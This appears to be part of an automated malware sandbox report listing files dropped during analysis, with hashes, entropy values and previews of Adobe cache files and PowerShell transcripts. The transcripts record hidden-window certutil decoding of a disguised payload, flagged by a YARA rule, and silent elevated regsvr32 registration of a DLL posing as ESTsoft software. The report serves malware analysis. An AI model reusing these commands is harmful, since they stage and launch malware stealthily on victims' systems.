Category:	dropped
Size (bytes):	64408
Entropy (8bit):	7.587474687549308
Encrypted:	false
SSDEEP:	768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
MD5:	6A95989BDB33E31A1CBA8258F4199040
SHA1:	3E81CCB803AA348212AEA8C9E31831DE991F972B
SHA-256:	BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
SHA-512:	D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
Malicious:	false
Preview:	......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$\|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	ASCII text
Category:	modified
Size (bytes):	294
Entropy (8bit):	5.208367716278872
Encrypted:	false
SSDEEP:	6:m3zAq2PPn2nKuAl9OmbnIFUtpc0ZmwPc0kwOPn2nKuAl9OmbjLJ:6Avn2HAahFUtpl/P35m2HAaSJ
MD5:	9FEEB360344F59197368D3C36FEE253A
SHA1:	DB39F82E57D1D84017ED87E9F49D0DF562DA9EDF
SHA-256:	3388BDB71AE2B8E7CDA2531053153DCDDF9BDA4F918BFEDCDF6159AD76B41F7C
SHA-512:	5895B3B89F77502D555A96CF95C74FF798404211CAD3B589D13C5C8F81498F35F42CAEADD6059619A6156090E28C29F3650778D4EBDDFD8489991D93D6E1F069
Malicious:	false
Preview:	2021/08/25-10:58:58.661 6196 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2021/08/25-10:58:58.666 6196 Recovering log #3.2021/08/25-10:58:58.666 6196 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy) Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.208367716278872
Encrypted:	false
SSDEEP:	6:m3zAq2PPn2nKuAl9OmbnIFUtpc0ZmwPc0kwOPn2nKuAl9OmbjLJ:6Avn2HAahFUtpl/P35m2HAaSJ
MD5:	9FEEB360344F59197368D3C36FEE253A
SHA1:	DB39F82E57D1D84017ED87E9F49D0DF562DA9EDF
SHA-256:	3388BDB71AE2B8E7CDA2531053153DCDDF9BDA4F918BFEDCDF6159AD76B41F7C
SHA-512:	5895B3B89F77502D555A96CF95C74FF798404211CAD3B589D13C5C8F81498F35F42CAEADD6059619A6156090E28C29F3650778D4EBDDFD8489991D93D6E1F069
Malicious:	false
Preview:	2021/08/25-10:58:58.661 6196 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2021/08/25-10:58:58.666 6196 Recovering log #3.2021/08/25-10:58:58.666 6196 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	786432
Entropy (8bit):	0.008087951114387475
Encrypted:	false
SSDEEP:	6:IiVzAKGzMiVzAKGzMiV+NenXczMiVxAi8bEnXczMiVxAi8bEnXczMiVxAi8bEnXO:I+Xd+XdlNe/0H8o/0H8o/0H8o
MD5:	53F5DC703BE9FCD61996101E2F6A9E76
SHA1:	0ECA6055C45CD86972B93DE98DE5B54A751DFA09
SHA-256:	657EDE3960A4E54B749BED21A8778A7A77E5011C346F5E053E0879ABDA6BB106
SHA-512:	55B1DAB7367BA60C3746F254FF028CDA7DDCDF16CF1F34DD5AA02EEE8C5C515B08C7663C0EAD133241B27FBE126B99B2F518AA1C30E16C17E0AF8F191CD8E522
Malicious:	false
Preview:	VLnk.....?......B....Y..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-210825102641Z-456.bmp Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	PC bitmap, Windows 3.x format, 107 x -152 x 32
Category:	dropped
Size (bytes):	65110
Entropy (8bit):	4.2198560366804525
Encrypted:	false
SSDEEP:	768:Wng8qAfr6ROonKau62uylygjJZaw8RIqHU9mm3jUcE7OmoaVRT5GmvteUr:Wg8df2Xx6oELCIqEmmRE7OmxVR9pr
MD5:	D2734655730CEE7E0C558FA03442DAF8
SHA1:	D109528D6F7A14AB32EF62909175CB8CB40BE65E
SHA-256:	60B58A8DF17BF8CEBDD05904EB3BA3F9C96259FB0914EF93CBFCFDC4D23324CD
SHA-512:	332517D1D16CBC6C9B026C810FFCEC3900B982ABEA5B289F7772F2421AC45216FBED3A096CABA76B89F4A3E0FA971BCCE413311278CDAE36D8E1552AB057EC85
Malicious:	false
Preview:	BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3024000
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	3.4454841474159394
Encrypted:	false
SSDEEP:	96:k49IVXEBodRBkWCIPbir7hxzCK449IVXEBodRBkWCIP6r7hxzCKI49IVXEBodRBK:HedRByedRBGedRBOedRBc
MD5:	86EB5BB2D1F9F3A785A7047EDA61D99C
SHA1:	FB8C576B19FEFCAB03E2796CDEA7EEBC949BDEEC
SHA-256:	DBD42C5753470A481145B064BF8E1A37599697EA0E8AEFE0ED3C25EDB958096D
SHA-512:	CA5715BD176FDE4169CC1D622DC036EB453577748ECB514846C1F2AC84331BA7ACB37EEB5BE4284CEDF19F75C6D496E4C71444DE609851D40AC24D31FDC0B34E
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................$.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	data
Category:	modified
Size (bytes):	34928
Entropy (8bit):	3.3113398978719064
Encrypted:	false
SSDEEP:	96:sCIPbir7hx/CPK949IVXEBodRBkICIPbir7hxzCKvt49IVXEBodRBkBCIP6r7hx8:diedRBQSedRBKCedRBhyedRB9
MD5:	8FA8AE01D833A5E8A8ED3C54E313ADC1
SHA1:	9548661072DB916242BF0CB6F4CD2B925F856D00
SHA-256:	5886D7AB07233C84056515B7368ED9BBB10A4D0368AD8D8F13303F8B9F71DC0F
SHA-512:	3FD999224C4DFE142E41467E79A53AE9451045486152DCDB3E7A040E876B1C1C5FEEED6EF21764FCB68EC705695820EDB15069D362EACCB50E25785319C077F6
Malicious:	false
Preview:	..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................W....X.W.L...y.......~........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt16.lst.5476 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	99226
Entropy (8bit):	5.20123718295693
Encrypted:	false
SSDEEP:	1536:amNTjRlaRlQShhp2VpMKRhWa11quVJzlzofqG9Z7ADWp1ttawvayjLp:RNj/aRlQShhp2VpMKRhWa11quVJG
MD5:	0CC5B651083D472BBBEA6912DDE3213E
SHA1:	4699D6270B6D68238852383C42A32E7FD1AD2D07
SHA-256:	5169784356F69B13E8A6A1726893AF02FDE7D786A343923E40C6762D0123FAA6
SHA-512:	3E790C90794609A928FDA4892E2CB57609FFF7BB0D8765763D8BBAC2B586083BBEE09B638595E0C5CB5481649F6DE045AF9ECD063BB8D55C96BBEE948948550C
Malicious:	false
Preview:	%!Adobe-FontList 1.16.%Locale:0x409..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Marlett.FamilyName:Marlett.StyleName:Regular.MenuName:Marlett.StyleBits:0.WeightClass:500.WidthClass:5.AngleClass:0.FullName:Marlett.WritingScript:Roman.WinName:Marlett.FileLength:27724.NameArray:0,Win,1,Marlett.NameArray:0,Mac,4,Marlett.NameArray:0,Win,1,Marlett.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:ArialMT.FamilyName:Arial.StyleName:Regular.MenuName:Arial.StyleBits:0.WeightClass:400.WidthClass:5.AngleClass:0.FullName:Arial.WritingScript:Roman.WinName:Arial.FileLength:1036584.NameArray:0,Win,1,Arial.NameArray:0,Mac,4,Arial.NameArray:0,Win,1,Arial.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Arial-BoldMT.FamilyName:Arial.StyleName:Bold.MenuName:Arial.StyleBits:2.WeightClass:700.WidthClass:5.AngleClass:0.FullName:Arial Bold.WritingScript:Roman.WinName:Arial Bold.FileLength:980756.NameArray:0,Win,1,Arial.NameArray:0,Mac,4,Arial Bold.NameAr

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst (copy) Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	99226
Entropy (8bit):	5.20123718295693
Encrypted:	false
SSDEEP:	1536:amNTjRlaRlQShhp2VpMKRhWa11quVJzlzofqG9Z7ADWp1ttawvayjLp:RNj/aRlQShhp2VpMKRhWa11quVJG
MD5:	0CC5B651083D472BBBEA6912DDE3213E
SHA1:	4699D6270B6D68238852383C42A32E7FD1AD2D07
SHA-256:	5169784356F69B13E8A6A1726893AF02FDE7D786A343923E40C6762D0123FAA6
SHA-512:	3E790C90794609A928FDA4892E2CB57609FFF7BB0D8765763D8BBAC2B586083BBEE09B638595E0C5CB5481649F6DE045AF9ECD063BB8D55C96BBEE948948550C
Malicious:	false
Preview:	%!Adobe-FontList 1.16.%Locale:0x409..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Marlett.FamilyName:Marlett.StyleName:Regular.MenuName:Marlett.StyleBits:0.WeightClass:500.WidthClass:5.AngleClass:0.FullName:Marlett.WritingScript:Roman.WinName:Marlett.FileLength:27724.NameArray:0,Win,1,Marlett.NameArray:0,Mac,4,Marlett.NameArray:0,Win,1,Marlett.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:ArialMT.FamilyName:Arial.StyleName:Regular.MenuName:Arial.StyleBits:0.WeightClass:400.WidthClass:5.AngleClass:0.FullName:Arial.WritingScript:Roman.WinName:Arial.FileLength:1036584.NameArray:0,Win,1,Arial.NameArray:0,Mac,4,Arial.NameArray:0,Win,1,Arial.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Arial-BoldMT.FamilyName:Arial.StyleName:Bold.MenuName:Arial.StyleBits:2.WeightClass:700.WidthClass:5.AngleClass:0.FullName:Arial Bold.WritingScript:Roman.WinName:Arial Bold.FileLength:980756.NameArray:0,Win,1,Arial.NameArray:0,Mac,4,Arial Bold.NameAr

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	42051
Entropy (8bit):	5.06012521068305
Encrypted:	false
SSDEEP:	768:FJe3V3IpNBQkj2MPfoJUpSHWrxhNefEYhSH3Nh4iUxifrRJPFBtAHk4a5V4WeXCB:Le3V3CNBQkj26CUp2WrxhNefEYhuh4iH
MD5:	BC8D1E99148F6A7FDE691CD5BC4B278D
SHA1:	83AA648C863CA9E2118480FBCFD6A9E704BD26B8
SHA-256:	5D4BF744ED0D45C44AF33B3EB894A320F195A10412255B679EDFF497B7A48EA7
SHA-512:	2C975A2D7B0A95A66CDF91E9B938B8B43EAE27AAD0F33A456A9B1C9DE9B3D0965678AA486346608B8671DF7FDA1AC354D18B3DA886FF2012CDB85259BF5A6398
Malicious:	false
Preview:	PSMODULECACHE.>..........?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet........r.(.....E...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetNat\NetNat.psd1........Get-NetNat........Add-NetNatExternalAddress........Get-NetNatExternalAddress........Set-NetNatGlobal........New-NetNat........Set-NetNat........Get-NetNatStaticMapping........Remove-NetNatExternalAddress........Get-NetNatSession........Add-NetNatStaticMapping........Get-NetNatGlobal........Remove-NetNatStaticMapping........Remove-NetNat.........h6.....O...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetSecurity\NetSecurity.psd1U.......Set-NetIPsecMainModeRule........Find-NetIPsecRule........Copy-NetIPsecRule........Rename-NetIPsecMainModeRule....!...Remove-NetIPsecQuickModeCryptoSet........New-NetFirewallRule........Rename-NetIPsecPhase1AuthSet........Get-NetIPsecQuickModeSA........Get-NetFirewallSetting........Show-NetIPsecR

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1tlnndwi.mse.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.566978116135921
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFiM9cMfQdc:SnqbKAKWG49Qdc
MD5:	0AC9C7286235950F220CBE970D3084FC
SHA1:	8C250343541F910315949B02672CF17293CA52F1
SHA-256:	30D1E4254E4D9A4A5081616761DD00F0DE0B96AEBDFBA0B4B241FC9EADF5EECA
SHA-512:	4542790A00FA3C99BE28C395A292F401E5A4E201ECF43249FE33A9B34E9CFF604CACC626F35BC2481332FC1FCD34A2699023C31A8A1BA9C2B9C30DC27B4B4714
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode 8/25/2021 10:58:27 AM

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_314synge.kay.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.566978116135921
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFiM9cMfQdc:SnqbKAKWG49Qdc
MD5:	0AC9C7286235950F220CBE970D3084FC
SHA1:	8C250343541F910315949B02672CF17293CA52F1
SHA-256:	30D1E4254E4D9A4A5081616761DD00F0DE0B96AEBDFBA0B4B241FC9EADF5EECA
SHA-512:	4542790A00FA3C99BE28C395A292F401E5A4E201ECF43249FE33A9B34E9CFF604CACC626F35BC2481332FC1FCD34A2699023C31A8A1BA9C2B9C30DC27B4B4714
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode 8/25/2021 10:58:27 AM

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b2myfuxn.df3.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.597721634601021
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFiM9cMfQcfUjko:SnqbKAKWG49QPko
MD5:	4B0B19ED1A16A24E390FDB0DBD07C969
SHA1:	9BC5EEC4D6C37EE4DBCE56422E3810E0204AA485
SHA-256:	C635D8D501C52A77903D752570A6C7F3B28EBFDE8B1B6F7FB30ACFFCF06E2298
SHA-512:	F2C040B6F5CFC1993B6CA5B5BDB75BDED1290F2AD9608B8460709DA396941F03432E06E5D02606F3FD32A7BF88E74153159AD44E97C66E3729FA65DE317B7FE5
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode 8/25/2021 10:59:14 AM

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dpukosai.css.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.597721634601021
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFiM9cMfQcfVYo:SnqbKAKWG49QaF
MD5:	79517927D5DC678F0983E0BF9141B096
SHA1:	9A94D52934B8085223B39284E824A320D328198D
SHA-256:	5A3CB2130D2993959F80CAE5BC2DF26A338A71EDF9278829D293386D77F627E0
SHA-512:	6D01CD98AE9FB4BDCB58AC3910734525D25168180F76AF2CE59F230DEEFDAED760DAA2C07C576425B17A09E831C7411D04F1B8B743D13C10C18FF775778176DC
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode 8/25/2021 10:59:04 AM

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jzw2oefn.flp.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.607041233393162
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFiM9cMfQdzo:SnqbKAKWG49Qdzo
MD5:	F81E09C73E361EF54C76DE36CC7443D0
SHA1:	6372C00FEE0E6EB4DBDEF267A50DB7480C05BF97
SHA-256:	57D237A370C67052E91756DA3A3C8EB0E5A9A08F84CE6A54FE502D9EB6143C85
SHA-512:	C1FA81083D792E6A673695A4FB0155C7C8D4C3B0ECB0C09B25733214360194DA550156A934DB1DE36214CC145F9C812B41CC77A679460C6B9E8DF2BF87B2540E
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode 8/25/2021 10:58:49 AM

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m5k2uwgu.rhk.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.607041233393162
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFiM9cMfQdzo:SnqbKAKWG49Qdzo
MD5:	F81E09C73E361EF54C76DE36CC7443D0
SHA1:	6372C00FEE0E6EB4DBDEF267A50DB7480C05BF97
SHA-256:	57D237A370C67052E91756DA3A3C8EB0E5A9A08F84CE6A54FE502D9EB6143C85
SHA-512:	C1FA81083D792E6A673695A4FB0155C7C8D4C3B0ECB0C09B25733214360194DA550156A934DB1DE36214CC145F9C812B41CC77A679460C6B9E8DF2BF87B2540E
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode 8/25/2021 10:58:49 AM

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pwvpeds3.jyy.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.597721634601021
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFiM9cMfQcfVYo:SnqbKAKWG49QaF
MD5:	79517927D5DC678F0983E0BF9141B096
SHA1:	9A94D52934B8085223B39284E824A320D328198D
SHA-256:	5A3CB2130D2993959F80CAE5BC2DF26A338A71EDF9278829D293386D77F627E0
SHA-512:	6D01CD98AE9FB4BDCB58AC3910734525D25168180F76AF2CE59F230DEEFDAED760DAA2C07C576425B17A09E831C7411D04F1B8B743D13C10C18FF775778176DC
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode 8/25/2021 10:59:04 AM

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yjlixia1.oiz.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.597721634601021
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFiM9cMfQcfUjko:SnqbKAKWG49QPko
MD5:	4B0B19ED1A16A24E390FDB0DBD07C969
SHA1:	9BC5EEC4D6C37EE4DBCE56422E3810E0204AA485
SHA-256:	C635D8D501C52A77903D752570A6C7F3B28EBFDE8B1B6F7FB30ACFFCF06E2298
SHA-512:	F2C040B6F5CFC1993B6CA5B5BDB75BDED1290F2AD9608B8460709DA396941F03432E06E5D02606F3FD32A7BF88E74153159AD44E97C66E3729FA65DE317B7FE5
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode 8/25/2021 10:59:14 AM

C:\Users\user\Documents\20210825\PowerShell_transcript.910646.BLm8LGmw.20210825105913.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	5.147237381250279
Encrypted:	false
SSDEEP:	24:BxSAjTp3RCvi3OQx2DOXisXA3bEMWz0jeuKK6X4CIym1ZJXLVA3bEunxSAZQ:BZlRCvqOQoOCbWzCKYB1ZgbBZZQ
MD5:	0B7BBD141D7FB4542A1374C43369F80C
SHA1:	02C808E1E32696033002289F2AAA5D849C940437
SHA-256:	17FA171B58D2ABBB8C979F79E87D6D28AA938E7030D047DC2C6273F9A44874EC
SHA-512:	70A1EC6A5C0C2F84F3DAD0E2A179D84047AE1504F0F787BCB7B6FC7A97EE5598CF9F460C4326BA5536F7F636A094AC04A73E60C8B79FCDAC465159FF3B4E1245
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210825105914..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas..Process ID: 2324..PSVersion: 5.1.17134.165..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.165..BuildVersion: 10.0.17134.165..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210825105914..******************..PS>start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas..******************..Command start time: 20210825110212..******************..PS>$global:?..True..*****************

C:\Users\user\Documents\20210825\PowerShell_transcript.910646.c593w7K1.20210825105827.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1218
Entropy (8bit):	5.24508468582021
Encrypted:	false
SSDEEP:	24:BxSAF3RCvi3OQx2DOXUWeWH0jeuKK6X4CIym1ZJXANZnxSAZx:BZBRCvqOQoOpHCKYB1ZOZZx
MD5:	1FC1A6A9D49B7BE9CD7323F6B46A5C4A
SHA1:	C56FC949EDBA224809EB44C8492FF3191F71CC68
SHA-256:	427DF863E391AC0A99BA6E457089B03CFE31DAB2DAA506063E4952136C8EAD0B
SHA-512:	AE8D7A1AB33A7B9E5E21A9BFFF6E6DB5C3A95E3AEAAB8127699FD5DD5AEFCE7A6A89EB7EEFB5058DB72A8568F7468F1E0E49F4F14061E0CB1751DB46570A3CCD
Malicious:	false
Yara Hits:	Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: C:\Users\user\Documents\20210825\PowerShell_transcript.910646.c593w7K1.20210825105827.txt, Author: Florian Roth
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210825105828..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a..Process ID: 304..PSVersion: 5.1.17134.165..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.165..BuildVersion: 10.0.17134.165..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210825105828..********************..PS>certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a..Input Length = 259416..Output Length = 194560..CertUtil: -decode command completed successful

C:\Users\user\Documents\20210825\PowerShell_transcript.910646.nPCQMNnw.20210825105903.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	5.152263139561
Encrypted:	false
SSDEEP:	24:BxSAsp3RCvi3OQx2DOXisXA3bEMWo0jeuKK6X4CIym1ZJX+A3bEPnxSAZJ:BZ0RCvqOQoOCbWoCKYB1ZTbaZZJ
MD5:	D12099E71CEBA18F2E7CCB23BC2B62FB
SHA1:	B91B290B2A6842FC9F2280D8E6D4331593B12940
SHA-256:	DA9FDDCD0B5DD7AECCFE212F95F263F7B12861372AB7988DEC2B1916FA4E5344
SHA-512:	0817FFAC3452690297879781DE0DA17249CAB41EDF8ABBF9A6FAEC61BA5A5D30DB991983338AB2B103A79DAB473170B2146745C27581F6E4F4DD6C84E8FA50CE
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210825105904..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas..Process ID: 5740..PSVersion: 5.1.17134.165..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.165..BuildVersion: 10.0.17134.165..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210825105904..******************..PS>start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas..******************..Command start time: 20210825110253..******************..PS>$global:?..True..*****************

C:\Users\user\Documents\20210825\PowerShell_transcript.910646.sSdEtW4E.20210825105848.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1041
Entropy (8bit):	5.1610752774522135
Encrypted:	false
SSDEEP:	24:BxSAA3RCvi3OQx2DOXUW8PlGWL0jeuKK6X4CIym1ZJXN41Pl2nxSAZO:BZsRCvqOQoOWLLCKYB1Z/aiZZO
MD5:	A878C4C68743CAC65674BFA242FA0CC1
SHA1:	47615AC7B86E080EF15F9E5161E6247CEB3CEB27
SHA-256:	81DE67A2762EE90A43A819AA7E200E4187DDD8BD0C57A876B3B5AFF570B24F4F
SHA-512:	50441547206B87F15BF42729F00556CF4E2483559D3B05A201B6D1B1E333A45640161A9A14254B8D37795E180B89DF00252F1BD229111A3B804D34B78AA68256
Malicious:	false
